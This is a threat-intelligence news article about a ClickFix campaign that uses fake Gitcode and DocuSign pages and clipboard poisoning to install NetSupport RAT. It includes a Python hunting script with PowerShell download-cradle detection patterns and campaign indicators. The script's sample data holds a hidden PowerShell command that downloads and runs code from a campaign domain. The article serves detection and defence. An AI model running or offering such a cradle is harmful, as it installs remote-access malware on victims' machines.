
Researchers from the DomainTools team have reported a new malicious campaign that uses counterfeit websites masquerading as popular platforms such as Gitcode and DocuSign. The objective is to trick users into manually executing a PowerShell script that installs NetSupport RAT, a legitimate remote administration product (NetSupport Manager) that is widely abused as a backdoor, on the victim's machine.
The attack begins when a user visits a fraudulent site designed to mimic a legitimate service. The site displays a CAPTCHA prompt, urging the visitor to complete what appears to be a routine verification step. Unbeknownst to the user, the page's script silently writes a PowerShell command to the system clipboard, a technique known as clipboard poisoning (also called pastejacking). The user is then given simple instructions: open the Run dialog (Win + R), paste the clipboard contents (Ctrl + V), and press Enter. Because the victim types the command rather than a browser executing it, no exploit is needed and the script runs with the user's own privileges. This social-engineering pattern is referred to as "ClickFix." One useful artifact for responders: commands entered in the Run dialog are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and the resulting powershell.exe process is a child of explorer.exe.
Upon execution, the script starts a cascading sequence of downloads. A first-stage loader fetches an intermediate script from the external domain tradingviewtool[.]com. That script in turn uses PowerShell to download an additional executable, wbdims.exe, from GitHub. wbdims.exe establishes persistence so that it runs every time the user logs in, and it connects to the command-and-control server docusign.sa[.]com (a domain chosen to look like DocuSign infrastructure), from which it retrieves further payloads through parameterized URLs.
The final stage downloads a ZIP archive containing the executable jp2launcher.exe, a file name borrowed from a legitimate Java component. Once launched, it installs NetSupport RAT, a legitimate remote administration tool long repurposed by cybercriminal groups for full control over compromised systems. Threat actors known to use this tool include FIN7, Scarlet Goldfinch, and Storm-0408.
What sets this campaign apart is its multi-layered PowerShell script chain, in which each script retrieves and launches the next. Because only a short, generic loader ever appears on the victim's screen and each later stage lives on a separate host that can be rotated or taken down independently, the approach complicates early detection, makes static analysis and cleanup harder, and increases the attack's overall stealth.
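The two behaviours described above (a pasted PowerShell download cradle launched from the Run dialog, and later stages that reference the reported domains and file names) are the natural hunting signals for this campaign. The following detection sketch is an added example written for this article, not DomainTools' tooling: it scans process-creation and network-connection records in a flattened JSON-lines shape (one object per line, with Sysmon-style field names such as Image, ParentImage, CommandLine and DestinationHostname) and flags records matching those signals. The sample records are constructed for the example; only the domains and file names come from the report, and they are kept defanged in the indicator list so the file stays inert.

```python
"""
ClickFix / NetSupport RAT hunting sketch (example code added to this article).

Flags two things in process-creation and network records:
  1. a PowerShell download cradle whose parent is explorer.exe, which is what
     a command pasted into the Win+R Run dialog looks like;
  2. any reference to the infrastructure or file names reported for this campaign.
"""
import json
import re
from dataclasses import dataclass

# Indicators from the report, kept defanged; refang() is applied when matching.
CAMPAIGN_DOMAINS = ("tradingviewtool[.]com", "docusign.sa[.]com")
CAMPAIGN_FILES = ("wbdims.exe", "jp2launcher.exe")

# Flags and cmdlets that typically appear in a pasted one-line download cradle.
CRADLE_PATTERNS = [
    r"-w(?:indowstyle)?\s+hidden",
    r"-e(?:p|xecutionpolicy)?\s+bypass",
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b",
    r"downloadstring|downloadfile",
    r"\biex\b|invoke-expression",
    r"-enc(?:odedcommand)?\s+[A-Za-z0-9+/=]{20,}",
]
CRADLE_RE = re.compile("|".join(CRADLE_PATTERNS), re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    reason: str
    image: str
    parent: str
    command: str


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


def parse_record(line: str) -> dict:
    """One JSON object per line (e.g. Sysmon forwarded through a log shipper)."""
    return json.loads(line)


def evaluate(fields: dict) -> list:
    """Return the list of reasons a single record is suspicious (empty if none)."""
    image = fields.get("Image", "").lower()
    parent = fields.get("ParentImage", "").lower()
    cmd = fields.get("CommandLine", "")
    host = fields.get("DestinationHostname", "").lower()
    reasons = []

    is_ps = image.endswith(("\\powershell.exe", "\\pwsh.exe"))
    if is_ps and CRADLE_RE.search(cmd):
        # The Run dialog is hosted by explorer.exe, so a ClickFix paste shows up
        # as explorer.exe -> powershell.exe with cradle-style arguments.
        if parent.endswith("\\explorer.exe"):
            reasons.append("PowerShell download cradle spawned by explorer.exe (Run dialog paste)")
        else:
            reasons.append("PowerShell download cradle")

    for d in CAMPAIGN_DOMAINS:
        live = refang(d)
        if live in cmd.lower() or host == live or host.endswith("." + live):
            reasons.append(f"campaign domain {d}")

    for f in CAMPAIGN_FILES:
        if image.endswith("\\" + f) or f in cmd.lower():
            reasons.append(f"campaign file {f}")

    return reasons


def scan(lines) -> list:
    findings = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        fields = parse_record(line)
        for reason in evaluate(fields):
            findings.append(Finding(n, reason, fields.get("Image", ""),
                                    fields.get("ParentImage", ""),
                                    fields.get("CommandLine", "")))
    return findings


# Constructed sample telemetry (not real captures). Paths and the exact command
# line are assumptions; the domains and file names are the ones reported.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"iex (iwr 'https://tradingviewtool.com')\""},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\wbdims.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\wbdims.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -c Get-ChildItem C:\Logs"},   # benign
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe report.txt"},                              # benign
    {"EventID": 3, "Image": r"C:\Users\alice\AppData\Local\Temp\wbdims.exe",
     "DestinationHostname": "docusign.sa.com", "DestinationPort": 443},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason} | {f.image} <- {f.parent} | {f.command}")
```

The explorer.exe parent check is what separates a ClickFix paste from the far more common case of PowerShell launched by an installer, a scheduled task or a management agent; in a real hunt, pair it with the RunMRU registry artifact from the same host, and treat the domain and file-name matches as confirmation rather than the primary signal, since the operators can rotate those far more easily than the Run-dialog behaviour.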
DomainTools also noted that the domain structure and malware delivery mechanisms closely resemble those used in the SocGholish campaign (also known as FakeUpdates). Both operations share similar social engineering tactics, domain registration patterns, and infection vectors.
Current evidence suggests that links to these spoofed websites are being disseminated via email and social media platforms, where adversaries entice users to click and unwittingly execute harmful actions on their devices.
NetSupport RAT remains a favored tool among cybercriminals due to its comprehensive control capabilities, including screen recording, file transfers, remote command execution, and access to sensitive information.